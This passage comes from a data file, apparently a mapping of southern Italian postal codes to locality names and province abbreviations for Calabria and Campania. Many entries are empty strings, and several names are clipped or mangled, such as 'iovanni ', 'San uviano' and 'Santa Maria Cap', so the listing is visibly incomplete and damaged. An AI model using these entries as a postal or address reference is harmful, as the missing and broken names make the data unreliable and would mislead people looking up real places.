"CZ"]], "88049": [["San Tommaso", "CZ"], ["Colla", "CZ"], ["", "CZ"]], "88050": [ ["Simeri", "CZ"], ["Belcastro", "CZ"], ["Sellia", "CZ"], ["Amaroni", "CZ"], ["Petrona'", "CZ"], ["Crichi", "CZ"], ["Vallefiorita", "CZ"], ["", "CZ"], ["", "CZ"], ["", "CZ"], ["Palermiti", "CZ"], ["", "CZ"], ["", "CZ"], ["", "CZ"], ["Uria", "CZ"], ["Magisano", "CZ"], ["Scoppolise", "CZ"], ["", "CZ"], ["Andali", "CZ"], ["Pentone", "CZ"], ["Marcedusa", "CZ"], ["", "CZ"], ["Petrizia", "CZ"], ["Cerva", "CZ"], ["", "CZ"], ["Calabricata", "CZ"], ["Zagarise", "CZ"], ], "88051": [["Cuturella", "CZ"], ["Cropani", "CZ"], ["", "CZ"]], "88054": [["Sersale", "CZ"]], "88055": [ ["", "CZ"], ["Albi", "CZ"], ["Buturo", "CZ"], ["", "CZ"], ["Taverna", "CZ"], ["", "CZ"], ["", "CZ"], ], "88056": [["Pratora", "CZ"], ["Tiriolo", "CZ"]], "88060": [ ["Davoli", "CZ"], ["", "CZ"], ["Montepaone", "CZ"], ["", "CZ"], ["", "CZ"], ["Argusto", "CZ"], ["San Sostene", "CZ"], ["", "CZ"], ["Montauro", "CZ"], ["", "CZ"], ["", "CZ"], ["", "CZ"], ["Badolato", "CZ"], ["Gagliato", "CZ"], ["", "CZ"], ["", "CZ"], ["", "CZ"], ["Petrizzi", "CZ"], ["", "CZ"], ["Satriano", "CZ"], ["", "CZ"], ["", "CZ"], ["Gasperina", "CZ"], ["Santa Caterina ", "CZ"], ], "88062": [["Cardinale", "CZ"], ["Novalba", "CZ"]], "88064": [["", "CZ"]], "88065": [["Guardavalle", "CZ"], ["", "CZ"]], "88067": [["Cenadi", "CZ"], ["Centrache", "CZ"], ["", "CZ"], ["Olivadi", "CZ"]], "88068": [["", "CZ"], ["", "CZ"], ["Soverato", "CZ"]], "88069": [ ["", "CZ"], ["Staletti", "CZ"], ["", "CZ"], ["Copanello", "CZ"], ["Squillace", "CZ"], ], "88070": [["Botricello", "CZ"]], "88100": [ ["Pontegrande", "CZ"], ["Sant'Elia", "CZ"], ["Siano", "CZ"], ["", "CZ"], ["", "CZ"], ["", "CZ"], ["Catanzaro", "CZ"], ["", "CZ"], ], "88811": [["", "KR"]], "88812": [["Crucoli", "KR"], ["Torretta", "KR"], ["", "KR"]], "88813": [["Ciro'", "KR"]], "88814": [["Melissa", "KR"], ["", "KR"]], "88815": [["", "KR"]], "88816": [["Strongoli", "KR"]], "88817": [["", "KR"], ["Carfizzi", "KR"]], "88818": [["Pallagorio", "KR"]], "88819": [["Verzino", "KR"]], "88821": [["", "KR"], ["Corazzo", "KR"]], "88822": [["Zinga", "KR"], ["Casabona", "KR"]], "88823": [["Umbriatico", "KR"], ["Perticaro", "KR"]], "88824": [["", "KR"]], "88825": [["Savelli", "KR"]], "88831": [["", "KR"], ["Scandale", "KR"]], "88832": [["Altilia", "KR"], ["", "KR"]], "88833": [["Caccuri", "KR"], ["Cerenzia", "KR"]], "88834": [["Castelsilano", "KR"]], "88835": [["Roccabernarda", "KR"]], "88836": [["Cotronei", "KR"]], "88837": [["Camellino", "KR"], ["Pagliarelle", "KR"], ["Foresta", "KR"], ["", "KR"]], "88838": [["Filippa", "KR"], ["Mesoraca", "KR"]], "88841": [ ["", "KR"], ["Sant'Anna", "KR"], ["", "KR"], ["", "KR"], ], "88842": [["", "KR"], ["Cutro", "KR"], ["", "KR"]], "88900": [["", "KR"], ["Crotone", "KR"], ["Papanice", "KR"]], "89010": [["Scido", "RC"], ["", "RC"], ["Varapodio", "RC"], ["Molochio", "RC"]], "89011": [ ["Marinella", "RC"], ["Ceramida", "RC"], ["Pellegrina", "RC"], ["", "RC"], ["", "RC"], ["", "RC"], ], "89012": [["Delianuova", "RC"]], "89013": [["", "RC"], ["", "RC"]], "89014": [ ["Tresilico", "RC"], ["Zurgonadio", "RC"], ["Piminoro", "RC"], ["Castellace", "RC"], ["Messignadi", "RC"], ["", "RC"], ], "89015": [["Palmi", "RC"], ["Taureana", "RC"], ["Trodio", "RC"]], "89016": [["Rizziconi", "RC"], ["Spina", "RC"], ["Drosi", "RC"], ["Cirello", "RC"]], "89017": [["", "RC"]], "89018": [ ["Acciarello", "RC"], ["", "RC"], ["Ferrito", "RC"], ["Cannitello", "RC"], ["", "RC"], ], "89020": [ ["Serrata", "RC"], ["", "RC"], ["", "RC"], ["Tritanti", "RC"], ["Maropati", "RC"], ["Giffone", "RC"], ["Melicucca'", "RC"], ["Melicucco", "RC"], ["", "RC"], ["Anoia", "RC"], ["", "RC"], ["", "RC"], ["'", "RC"], ["Candidoni", "RC"], ["Sinopoli", "RC"], ], "89021": [["Cinquefrondi", "RC"]], "89022": [["Cittanova", "RC"]], "89023": [["Stelletanone", "RC"], ["Bellantone", "RC"], ["", "RC"]], "89024": [["Polistena", "RC"]], "89025": [["Bosco", "RC"], ["Rosarno", "RC"]], "89026": [["", "RC"]], "89027": [["", "RC"]], "89028": [["Seminara", "RC"], ["Barritteri", "RC"], ["Sant'Anna", "RC"], ["", "RC"]], "89029": [ ["", "RC"], ["Taurianova", "RC"], ["", "RC"], ["", "RC"], ], "89030": [ ["Condofuri", "RC"], ["Benestare", "RC"], ["", "RC"], ["Staiti", "RC"], ["Motticella", "RC"], ["Ferruzzano", "RC"], ["Careri", "RC"], ["Casignana", "RC"], ["Belloro", "RC"], ["", "RC"], ["", "RC"], ["", "RC"], ["", "RC"], ["", "RC"], ["", "RC"], ["Samo", "RC"], ["Africo", "RC"], ["Natile", "RC"], ["Canalello", "RC"], ["", "RC"], ["", "RC"], ], "89031": [["Bombile", "RC"], ["", "RC"], ["Ardore", "RC"]], "89032": [["Pardesca", "RC"], ["Bianco", "RC"]], "89033": [["Bova", "RC"]], "89034": [ ["", "RC"], ["", "RC"], ["Bovalino", "RC"], ["", "RC"], ], "89035": [["", "RC"]], "89036": [["", "RC"], ["", "RC"], ["Galati", "RC"], ["Brancaleone", "RC"]], "89037": [["", "RC"], ["", "RC"]], "89038": [["", "RC"], ["Palizzi", "RC"], ["", "RC"], ["Pietrapennata", "RC"]], "89039": [["Plati'", "RC"]], "89040": [ ["Monasterace", "RC"], ["Martone", "RC"], ["Stignano", "RC"], ["", "RC"], ["", "RC"], ["", "RC"], ["Riace", "RC"], ["Canolo", "RC"], ["", "RC"], ["Gerace", "RC"], ["", "RC"], ["Cimina'", "RC"], ["Bivongi", "RC"], ["", "RC"], ["Condojanni", "RC"], ["Pazzano", "RC"], ["", "RC"], ["Antonimina", "RC"], ["Cirella", "RC"], ["Placanica", "RC"], ["", "RC"], ["Camini", "RC"], ["Portigliola", "RC"], ], "89041": [ ["", "RC"], ["Ursini", "RC"], ["", "RC"], ["", "RC"], ["Caulonia", "RC"], ], "89042": [["Gioiosa Ionica", "RC"]], "89043": [["Grotteria", "RC"], ["", "RC"]], "89044": [["Merici", "RC"], ["", "RC"], ["Moschetta", "RC"], ["Locri", "RC"]], "89045": [["Mammola", "RC"]], "89046": [["", "RC"]], "89047": [["Roccella Ionica", "RC"]], "89048": [["Siderno Superiore", "RC"], ["Donisi", "RC"], ["Siderno", "RC"], ["", "RC"]], "89049": [["Stilo", "RC"]], "89050": [ ["", "RC"], ["Cosoleto", "RC"], ["Fiumara", "RC"], ["", "RC"], ["Sant'Alessio In Aspromonte", "RC"], ["", "RC"], ["Colelli", "RC"], ["Sitizano", "RC"], ["Laganadi", "RC"], ["Acquacalda", "RC"], ["Plaesano", "RC"], ["Calanna", "RC"], ], "89052": [["Campo Calabro", "RC"]], "89054": [["Galatro", "RC"]], "89056": [["Lubrichi", "RC"], ["", "RC"]], "89057": [[" In Aspromonte", "RC"], ["Gambarie", "RC"]], "89058": [["Scilla", "RC"], ["Favazzina", "RC"], ["Milea", "RC"], ["Melia", "RC"]], "89060": [ ["", "RC"], ["Ghorio", "RC"], ["Bagaladi", "RC"], ["Cardeto", "RC"], ["", "RC"], ["Roghudi", "RC"], ["", "RC"], ], "89062": [["Lazzaro", "RC"]], "89063": [ ["", "RC"], ["Anna'", "RC"], ["Pentedattilo", "RC"], ["Caredia", "RC"], ["Lacco", "RC"], ["Prunella", "RC"], ], "89064": [["Masella", "RC"], ["", "RC"], ["", "RC"], ["", "RC"]], "89065": [["", "RC"]], "89069": [ ["", "RC"], ["", "RC"], ["Chorio", "RC"], ["", "RC"], ["", "RC"], ], "89100": [["", "RC"]], "89121": [["", "RC"], ["Archi", "RC"], ["Santa Caterina", "RC"]], "89122": [["Vito", "RC"], ["", "RC"]], "89123": [["", "RC"]], "89124": [["", "RC"], ["Eremo", "RC"]], "89125": [["", "RC"]], "89126": [ ["Orti'", "RC"], ["", "RC"], ["Cerasi", "RC"], ["Arasi'", "RC"], ["Trizzino", "RC"], ["Schindilifa'", "RC"], ["Terreti", "RC"], ["", "RC"], ["Podargoni", "RC"], ["In V", "RC"], ["Trabocchetto", "RC"], ["Orti' Superiore", "RC"], ["Orti' Inferiore", "RC"], ], "89127": [["", "RC"]], "89128": [["", "RC"], ["Spirito Santo", "RC"]], "89129": [["", "RC"]], "89131": [["", "RC"], ["Armo", "RC"], ["Ravagnese", "RC"], ["Gallina", "RC"], ["Puzzi", "RC"]], "89132": [["", "RC"]], "89133": [ ["", "RC"], ["Cataforio", "RC"], ["Mosorrofa", "RC"], ["Sbarre", "RC"], ["", "RC"], ["San Salvatore", "RC"], ["Pavigliana", "RC"], ["Cannavo'", "RC"], ["Vinco", "RC"], ["", "RC"], ], "89134": [ ["", "RC"], ["", "RC"], ["Bocale", "RC"], ["Pellaro", "RC"], ["", "RC"], ], "89135": [ ["", "RC"], ["Diminniti", "RC"], ["Sambatello", "RC"], ["Rosali'", "RC"], ["Gallico", "RC"], ["", "RC"], ["", "RC"], ["Catona", "RC"], ], "89812": [["Pizzo", "VV"], ["", "VV"]], "89813": [["Polia", "VV"], ["Menniti", "VV"], ["Trecroci", "VV"]], "89814": [["Montesoro", "VV"], ["Scarro", "VV"], ["Filadelfia", "VV"]], "89815": [["", "VV"]], "89816": [["Cessaniti", "VV"], ["", "VV"], ["Favelloni", "VV"], ["Pannaconi", "VV"]], "89817": [ ["Sciconi", "VV"], ["Paradisoni", "VV"], ["Potenzoni", "VV"], ["San Costantino", "VV"], ["", "VV"], ["Briatico", "VV"], ], "89818": [["Capistrano", "VV"]], "89819": [["", "VV"]], "89821": [["Vallelonga", "VV"], ["", "VV"]], "89822": [["Brognaturo", "VV"], ["", "VV"], ["Simbario", "VV"], ["Spadola", "VV"]], "89823": [["Mongiana", "VV"], ["Fabrizia", "VV"]], "89824": [["Nardodipace", "VV"]], "89831": [ ["Sant'Angelo", "VV"], ["Sorianello", "VV"], ["", "VV"], ["", "VV"], ["Gerocarne", "VV"], ["Ciano", "VV"], ], "89832": [["Limpidi", "VV"], ["Acquaro", "VV"], ["Arena", "VV"], ["Dasa'", "VV"]], "89833": [["", "VV"], ["Monsoreto", "VV"], ["Dinami", "VV"]], "89834": [["Vazzano", "VV"], ["Pizzoni", "VV"]], "89841": [ ["Rombiolo", "VV"], ["Presinaci", "VV"], ["Moladi", "VV"], ["Pernocari", "VV"], ["Arzona", "VV"], ["Filandari", "VV"], ["Pizzinni", "VV"], ], "89842": [["San Calogero", "VV"], ["", "VV"]], "89843": [["Stefanaconi", "VV"], ["Sant'Onofrio", "VV"], ["Filogaso", "VV"], ["Maierato", "VV"]], "89844": [ ["Badia", "VV"], ["Limbadi", "VV"], ["Mandaradoni", "VV"], ["", "VV"], ["Nicotera", "VV"], ["Preitoni", "VV"], ["", "VV"], ["Comerconi", "VV"], ["Caroni", "VV"], ], "89851": [["Jonadi", "VV"], ["", "VV"], ["Nao", "VV"], ["Francica", "VV"]], "89852": [["Mileto", "VV"], ["Paravati", "VV"], ["", "VV"], ["Comparni", "VV"]], "89853": [["", "VV"]], "89861": [["Tropea", "VV"], ["Parghelia", "VV"], ["Fitili", "VV"]], "89862": [["Drapia", "VV"], ["Gasponi", "VV"], ["Caria", "VV"], ["Brattiro'", "VV"]], "89863": [["Coccorino", "VV"], ["Joppolo", "VV"], ["Caroniti", "VV"]], "89864": [["Panaia", "VV"], ["Spilinga", "VV"]], "89866": [ ["Barbalaconi", "VV"], ["San Nicolo' Di Ricadi", "VV"], ["Santa Domenica Ricadi", "VV"], ["San Nicolo'", "VV"], ["Santa Domenica", "VV"], ["Lampazzone", "VV"], ["Ricadi", "VV"], ], "89867": [["Zaccanopoli", "VV"], ["Zungri", "VV"]], "89868": [["Zambrone", "VV"], ["Daffina'", "VV"], ["iovanni ", "VV"]], "89900": [ ["Longobardi", "VV"], ["", "VV"], ["", "VV"], ["", "VV"], ["Vena", "VV"], ["", "VV"], ["Piscopio", "VV"], ["", "VV"], ["Triparni", "VV"], ], "83010": [ ["Grottolella", "AV"], ["", "AV"], ["Torrioni", "AV"], ["Summonte", "AV"], ["Tufo", "AV"], ["Starze", "AV"], ["", "AV"], ["", "AV"], ["Chianche", "AV"], ["", "AV"], ["", "AV"], ], "83011": [["", "AV"]], "83012": [["Cervinara", "AV"], ["Trescine", "AV"], ["Ioffredo", "AV"]], "83013": [ ["", "AV"], ["Mercogliano", "AV"], ["Torelli", "AV"], ["", "AV"], ["Torrette", "AV"], ], "83014": [["", "AV"]], "83015": [["Pietrastornina", "AV"], ["", "AV"]], "83016": [["", "AV"], ["Roccabascerana", "AV"], ["Squillani", "AV"], ["", "AV"]], "83017": [["", "AV"], ["Rotondi", "AV"]], "83018": [["", "AV"]], "83020": [ ["", "AV"], ["", "AV"], ["Domicella", "AV"], ["Petruro", "AV"], ["Quadrelle", "AV"], ["Celzi", "AV"], ["", "AV"], ["Forino", "AV"], ["Cesinali", "AV"], ["", "AV"], ["", "AV"], ["Taurano", "AV"], ["Contrada", "AV"], ["Moschiano", "AV"], ["Sperone", "AV"], ["Casola", "AV"], ["", "AV"], ["Quindici", "AV"], ["Sirignano", "AV"], ], "83021": [["Avella", "AV"]], "83022": [["Baiano", "AV"]], "83023": [["Lauro", "AV"], ["Fontenovella", "AV"], ["Migliano", "AV"]], "83024": [["", "AV"], ["Molinelle", "AV"]], "83025": [ ["Borgo Di Montoro Inferiore", "AV"], ["Montoro", "AV"], ["Preturo", "AV"], ["Aterrana", "AV"], ["Caliano", "AV"], ["Torchiati", "AV"], ["", "AV"], ["Figlioli", "AV"], ["Borgo", "AV"], ["Piano", "AV"], ["San Pietro", "AV"], ["Banzano", "AV"], ["Misciano", "AV"], ["Montoro Superiore", "AV"], ["Montoro Inferiore", "AV"], ], "83026": [["San Pietro Di Montoro Superiore", "AV"], ["Banzano Di Montoro Superiore", "AV"]], "83027": [["", "AV"]], "83028": [ ["Serino", "AV"], ["Sala", "AV"], ["", "AV"], ["Canale", "AV"], ["", "AV"], ["", "AV"], ], "83029": [["", "AV"], ["", "AV"], ["Solofra", "AV"]], "83030": [ ["", "AV"], ["", "AV"], ["Venticano", "AV"], ["Campanarello", "AV"], ["Montefredane", "AV"], ["Lapio", "AV"], ["Zungoli", "AV"], ["Prata Di Principato Ultra", "AV"], ["", "AV"], ["Montefusco", "AV"], ["Dentecane", "AV"], ["", "AV"], ["Manocalzati", "AV"], ["Arcella", "AV"], ["Serra", "AV"], ["Pietradefusi", "AV"], ["", "AV"], ["", "AV"], ["Montaguto", "AV"], ["Greci", "AV"], ["Montefalcione", "AV"], ["", "AV"], ["", "AV"], ["", "AV"], ["Taurasi", "AV"], ["", "AV"], ], "83031": [ ["", "AV"], ["Palazzisi", "AV"], ["", "AV"], ["", "AV"], ["", "AV"], ["Orneta", "AV"], ], "83032": [["Morroni", "AV"], ["Bonito", "AV"]], "83034": [["Casalbore", "AV"]], "83035": [["Grottaminarda", "AV"], ["Carpignano", "AV"]], "83036": [["Calore", "AV"], ["Pianopantano", "AV"], ["", "AV"], ["", "AV"]], "83037": [["", "AV"]], "83038": [["Montemiletto", "AV"], ["Montaperto", "AV"]], "83039": [ ["Serra", "AV"], ["", "AV"], ["", "AV"], ["", "AV"], ["", "AV"], ], "83040": [ ["", "AV"], ["", "AV"], ["Fontanarosa", "AV"], ["Carife", "AV"], ["Alvano", "AV"], ["Materdomini", "AV"], ["", "AV"], ["Andretta", "AV"], ["Castelfranci", "AV"], ["", "AV"], ["Mattinella", "AV"], ["Cairano", "AV"], ["Gesualdo", "AV"], ["", "AV"], ["", "AV"], ["Luogosano", "AV"], ["", "AV"], ["Quaglietta", "AV"], ["Frigento", "AV"], ["Flumeri", "AV"], ["Calabritto", "AV"], ["Montemarano", "AV"], ["Caposele", "AV"], ["", "AV"], ["Candida", "AV"], ["Pagliara", "AV"], ], "83041": [["Aquilonia", "AV"]], "83042": [["Atripalda", "AV"]], "83043": [["Laceno", "AV"], ["", "AV"], ["", "AV"]], "83044": [["", "AV"], ["", "AV"], ["Bisaccia", "AV"]], "83045": [["Calitri", "AV"]], "83046": [["Lacedonia", "AV"]], "83047": [["Lioni", "AV"]], "83048": [["", "AV"], ["", "AV"], ["Montella", "AV"]], "83049": [["Monteverde", "AV"]], "83050": [ ["", "AV"], ["", "AV"], ["", "AV"], ["", "AV"], ["Parolise", "AV"], ["", "AV"], ["", "AV"], ["", "AV"], ["Scampitella", "AV"], ["", "AV"], ["", "AV"], ["Villamaina", "AV"], ["", "AV"], ["Vallesaccarda", "AV"], ["Senerchia", "AV"], ], "83051": [["Ponteromito", "AV"], ["Nusco", "AV"]], "83052": [["Paternopoli", "AV"]], "83053": [["", "AV"]], "83054": [["", "AV"], ["San Vito", "AV"], ["San Vito Dei Lombardi", "AV"]], "83055": [["Sturno", "AV"]], "83056": [["Teora", "AV"]], "83057": [["", "AV"]], "83058": [["Trevico", "AV"], ["Molini", "AV"]], "83059": [["Vallata", "AV"]], "83100": [["Avellino", "AV"], ["", "AV"], ["", "AV"], ["Picarelli", "AV"]], "82010": [ ["Moiano", "BN"], ["", "BN"], ["Ripabianca", "BN"], ["Beltiglio", "BN"], ["", "BN"], ["Perrillo", "BN"], ["Iannassi", "BN"], ["", "BN"], ["Motta", "BN"], ["Bucciano", "BN"], ["", "BN"], ["Maccoli", "BN"], ["", "BN"], ["Luzzano", "BN"], ["Bagnara", "BN"], ["Arpaise", "BN"], ["Pastene", "BN"], ["", "BN"], ["Montorsi", "BN"], ["Monterocchetta", "BN"], ["Terranova", "BN"], ["", "BN"], ["Pagliara", "BN"], ["", "BN"], ["Ceppaloni", "BN"], ["Cavuoti", "BN"], ["", "BN"], ], "82011": [["Forchia", "BN"], ["Arpaia", "BN"], ["Paolisi", "BN"], ["Airola", "BN"]], "82013": [["Bonea", "BN"]], "82015": [["Durazzano", "BN"]], "82016": [["Cirignano", "BN"], ["Varoni", "BN"], ["Montesarchio", "BN"]], "82017": [["Pannarano", "BN"]], "82018": [ ["", "BN"], ["Calvi", "BN"], ["Cubante", "BN"], ["San ", "BN"], ["", "BN"], ], "82019": [["Bagnoli", "BN"], ["Faggiano", "BN"], ["", "BN"], ["Laiano", "BN"]], "82020": [ ["", "BN"], ["", "BN"], ["", "BN"], ["Circello", "BN"], ["Santa Croce Del Sannio", "BN"], ["Paduli", "BN"], ["Campolattaro", "BN"], ["", "BN"], ["", "BN"], ["", "BN"], ["Reino", "BN"], ["Pietrelcina", "BN"], ["Baselice", "BN"], ["Foiano Di Val Fortore", "BN"], ["Molinara", "BN"], ["Buonalbergo", "BN"], ], "82021": [["Apice Nuovo", "BN"], ["Apice", "BN"], ["", "BN"]], "82022": [["Castelfranco In Miscano", "BN"]], "82023": [["Castelvetere In Val Fortore", "BN"]], "82024": [["", "BN"], ["Castelpagano", "BN"], ["Decorata", "BN"]], "82025": [["Montefalcone Di Val Fortore", "BN"]], "82026": [["Sassinoro", "BN"], ["Morcone", "BN"], ["Cuffiano", "BN"]], "82027": [["Giallonardo", "BN"], ["Casalduni", "BN"], ["Pontelandolfo", "BN"]], "82028": [["", "BN"]], "82029": [["", "BN"]], "82030": [ ["Torrecuso", "BN"], ["Pietraroja", "BN"], ["Limatola", "BN"], ["Ponte", "BN"], ["Melizzano", "BN"], ["Dugenta", "BN"], ["", "BN"], ["Foglianise", "BN"], ["Castelpoto", "BN"], ["Paupisi", "BN"], ["", "BN"], ["Biancano", "BN"], ["Massa", "BN"], ["Apollosa", "BN"], ["Giardoni", "BN"], ["", "BN"], ["", "BN"], ["", "BN"], ["", "BN"], ["Cautano", "BN"], ["Faicchio", "BN"], ["Cacciano", "BN"], ["Torello", "BN"], ["Puglianello", "BN"], ["", "BN"], ], "82031": [["Amorosi", "BN"]], "82032": [["", "BN"]], "82033": [["", "BN"], ["", "BN"]], "82034": [["", "BN"], ["", "BN"], ["", "BN"]], "82036": [["Solopaca", "BN"]], "82037": [["", "BN"], ["Castelvenere", "BN"]], "82038": [["Vitulano", "BN"]], "82100": [["Benevento", "BN"], ["Perrillo", "BN"], ["Pastene", "BN"]], "81010": [ ["Letino", "CE"], ["Torcino", "CE"], ["Squille", "CE"], ["", "CE"], ["", "CE"], ["Dragoni", "CE"], ["Carattano", "CE"], ["", "CE"], ["Calvisi", "CE"], ["", "CE"], ["", "CE"], ["Ailano", "CE"], ["Vallelunga", "CE"], ["Ciorlano", "CE"], ["", "CE"], ["Pratella", "CE"], ["Alvignanello", "CE"], ["", "CE"], ["", "CE"], ["", "CE"], ["Ruviano", "CE"], ], "81011": [["Totari", "CE"], ["Alife", "CE"]], "81012": [["Alvignano", "CE"], ["", "CE"]], "81013": [ ["", "CE"], ["", "CE"], ["", "CE"], ["Caiazzo", "CE"], ], "81014": [["Fontegreca", "CE"], ["", "CE"]], "81016": [ ["", "CE"], ["", "CE"], ["", "CE"], ["", "CE"], ["Sepicciano", "CE"], ], "81017": [["Quattroventi", "CE"], ["", "CE"], ["Raviscanina", "CE"]], "81020": [ ["", "CE"], ["Capodrise", "CE"], ["Casapulla", "CE"], ["", "CE"], ["", "CE"], ["", "CE"], ["Annunziata", "CE"], ["Recale", "CE"], ], "81021": [["Arienzo", "CE"]], "81022": [["Casagiove", "CE"]], "81023": [["Messercola", "CE"], ["Cervino", "CE"], ["", "CE"]], "81024": [["Grotticella", "CE"], ["Montedecoro", "CE"], ["Maddaloni", "CE"]], "81025": [["Cantone", "CE"], ["Marcianise", "CE"]], "81027": [ ["", "CE"], ["", "CE"], ["Cave", "CE"], ["", "CE"], ["", "CE"], ["Polvica", "CE"], ], "81028": [["", "CE"]], "81030": [ ["Arnone", "CE"], ["", "CE"], ["Teverola", "CE"], ["", "CE"], ["", "CE"], ["", "CE"], ["Carinola", "CE"], ["Frignano", "CE"], ["", "CE"], ["Cesa", "CE"], ["", "CE"], ["Sant'Arpino", "CE"], ["Succivo", "CE"], ["", "CE"], ["Casale", "CE"], ["Cellole", "CE"], ["Lusciano", "CE"], ["Casaluce", "CE"], ["Nocelleto", "CE"], ["Cancello", "CE"], ["", "CE"], ["Parete", "CE"], ["Casanova", "CE"], ["", "CE"], ["", "CE"], ["Casapesenna", "CE"], ], "81031": [["Aversa", "CE"]], "81032": [["Carinaro", "CE"]], "81033": [["", "CE"]], "81034": [["Mondragone", "CE"]], "81035": [ ["Gallo", "CE"], ["Ameglio", "CE"], ["Roccamonfina", "CE"], ["", "CE"], ["Fontanafredda", "CE"], ["Campagnola", "CE"], ["Filorsi", "CE"], ["Garofali", "CE"], ["Grottola", "CE"], ], "81036": [["'Aversa", "CE"]], "81037": [ ["", "CE"], ["Corigliano", "CE"], ["", "CE"], ["", "CE"], ["", "CE"], ["Sant'Agata", "CE"], ["Carano", "CE"], ["Fasani", "CE"], ["", "CE"], ["", "CE"], ["", "CE"], ["San Carlo Di Sessa Aurunca", "CE"], ["Fontanaradina", "CE"], ["San Martino Di Sessa Aurunca", "CE"], ["", "CE"], ["", "CE"], ["", "CE"], ["Piedimonte", "CE"], ["Cupa", "CE"], ["Valogno", "CE"], ["Cascano", "CE"], ], "81038": [["", "CE"]], "81039": [["", "CE"], ["", "CE"]], "81040": [ ["", "CE"], ["Cisterna", "CE"], ["", "CE"], ["", "CE"], ["Treglia", "CE"], ["Formicola", "CE"], ["Curti", "CE"], ["", "CE"], ["Pontelatone", "CE"], ["Pietravairano", "CE"], ["Cocuruzzo", "CE"], ["Camino", "CE"], ["Liberi", "CE"], ["", "CE"], ["", "CE"], ["", "CE"], ["", "CE"], ], "81041": [["Vitulazio", "CE"], ["Bellona", "CE"]], "81042": [ ["", "CE"], ["Petrulo", "CE"], ["Pozzillo", "CE"], ["", "CE"], ["", "CE"], ["", "CE"], ["Petrullo", "CE"], ["Visciano", "CE"], ], "81043": [["Capua", "CE"], ["", "CE"]], "81044": [ ["", "CE"], ["Tora", "CE"], ["Piccilli", "CE"], ["Orchi", "CE"], ["", "CE"], ["Sipicciano", "CE"], ["Galluccio", "CE"], ["", "CE"], ["Cave", "CE"], ["Vaglie", "CE"], ], "81046": [["Grazzanise", "CE"], ["Brezza", "CE"], ["", "CE"], ["", "CE"]], "81047": [["", "CE"], ["Caturano", "CE"]], "81049": [["", "CE"], ["San Pietro Infine", "CE"], ["Caspoli", "CE"]], "81050": [ ["", "CE"], ["", "CE"], ["Musicile", "CE"], ["", "CE"], ["Montanaro", "CE"], ["Pastorano", "CE"], ["Francolise", "CE"], ["Ciamprisco", "CE"], ["", "CE"], ["Pantuliano", "CE"], ["Camigliano", "CE"], ["", "CE"], ["Presenzano", "CE"], ], "81051": [["Roccaromana", "CE"], ["Statigliano", "CE"], ["Pietramelara", "CE"]], "81052": [["", "CE"]], "81053": [["Riardo", "CE"]], "81054": [["San Prisco", "CE"]], "81055": [["Santa Maria Cap", "CE"]], "81056": [["Sparanise", "CE"]], "81057": [ ["San Marco", "CE"], ["", "CE"], ["Furnolo", "CE"], ["Pugliano", "CE"], ["Casamostra", "CE"], ["Teano", "CE"], ["Casafredda", "CE"], ["Versano", "CE"], ["Fontanelle", "CE"], ["Casi", "CE"], ["Casale", "CE"], ["", "CE"], ], "81058": [ ["Vairano", "CE"], ["", "CE"], ["Patenora", "CE"], ["Marzanello", "CE"], ["", "CE"], ], "81059": [["", "CE"], ["Caianello", "CE"], ["", "CE"], ["Montano", "CE"]], "81100": [ ["Casolla", "CE"], ["Tredici", "CE"], ["Staturano", "CE"], ["Briano", "CE"], ["Tuoro", "CE"], ["Ercole", "CE"], ["Mezzano", "CE"], ["Caserta", "CE"], ["Falciano", "CE"], ["", "CE"], ["Puccianiello", "CE"], ["Vaccheria", "CE"], ["Centurano", "CE"], ["", "CE"], ["Casola", "CE"], ["", "CE"], ["", "CE"], ["", "CE"], ["Casertavecchia", "CE"], ["", "CE"], ], "80010": [["Scalzapecora", "NA"], ["Quarto", "NA"], ["Torretta", "NA"], ["Villaricca", "NA"]], "80011": [["Pezzalunga", "NA"], ["Acerra", "NA"]], "80012": [["Calvizzano", "NA"]], "80013": [ ["", "NA"], ["Tavernanova", "NA"], ["", "NA"], ["Casarea", "NA"], ], "80014": [["", "NA"], ["Varcaturo", "NA"], ["", "NA"]], "80016": [["", "NA"], ["", "NA"], ["", "NA"]], "80017": [["", "NA"]], "80018": [["", "NA"]], "80019": [["Qualiano", "NA"]], "80020": [["Crispano", "NA"], ["", "NA"], ["Casavatore", "NA"], ["Frattaminore", "NA"]], "80021": [["Afragola", "NA"]], "80022": [["Arzano", "NA"]], "80023": [["Pascarola", "NA"], ["Caivano", "NA"]], "80024": [["Carditello", "NA"], ["Cardito", "NA"]], "80025": [["Casandrino", "NA"]], "80026": [["Arpino", "NA"], ["Casoria", "NA"]], "80027": [["Frattamaggiore", "NA"]], "80028": [["", "NA"]], "80029": [["Sant'Antimo", "NA"]], "80030": [ ["", "NA"], ["Camposano", "NA"], ["Cimitile", "NA"], ["", "NA"], ["Visciano", "NA"], ["Spartimento", "NA"], ["Gallo", "NA"], ["", "NA"], ["Comiziano", "NA"], ["Gargani", "NA"], ["Mariglianella", "NA"], ["Schiava", "NA"], ["Scisciano", "NA"], ["Liveri", "NA"], ["Tufino", "NA"], ["San Paolo Bel Sito", "NA"], ["Roccarainola", "NA"], ], "80031": [["Brusciano", "NA"]], "80032": [["Casamarciano", "NA"]], "80033": [["Cicciano", "NA"]], "80034": [["Marigliano", "NA"], ["Faibano", "NA"], ["Lausdomini", "NA"], ["Selva", "NA"], ["Casaferro", "NA"]], "80035": [["Nola", "NA"], ["Polvica", "NA"], ["Piazzolla", "NA"], ["Cinquevie", "NA"], ["Pollastri", "NA"]], "80036": [["", "NA"], ["", "NA"], ["Vico", "NA"], ["Castello", "NA"]], "80038": [["", "NA"]], "80039": [["Saviano", "NA"], ["", "NA"]], "80040": [ ["Volla", "NA"], ["", "NA"], ["San uviano", "NA"], ["Flocco", "NA"], ["Caravita", "NA"], ["Terzigno", "NA"], ["", "NA"], ["Musci", "NA"], ["Trecase", "NA"], ["Poggiomarino", "NA"], ["Cercola", "NA"], [" Al Vesuvio", "NA"], ["Striano", "NA"], ["", "NA"], ], "80041": [["Boscoreale", "NA"], ["Marchesa", "NA"]], "80042": [["Boscotrecase", "NA"]], "80044": [["Ottaviano", "NA"], ["San Gennarello", "NA"]], "80045": [["Mariconda", "NA"], ["Messigno", "NA"], ["Pompei", "NA"], ["", "NA"]], "80046": [["", "NA"]], "80047": [["Santa Maria La Scala", "NA"], ["", "NA"], ["Casilli", "NA"]], "80048": [ ["", "NA"], ["", "NA"], ["", "NA"], ["Sant'Anastasia", "NA"], ], "80049": [["", "NA"]], "80050": [ ["'", "NA"], ["Pimonte", "NA"], ["Pia", "NA"], ["Tralia", "NA"], ["Franche", "NA"], ["Piazza", "NA"], ["", "NA"], ["San Nicola", "NA"], ["Lettere", "NA"], ], "80051": 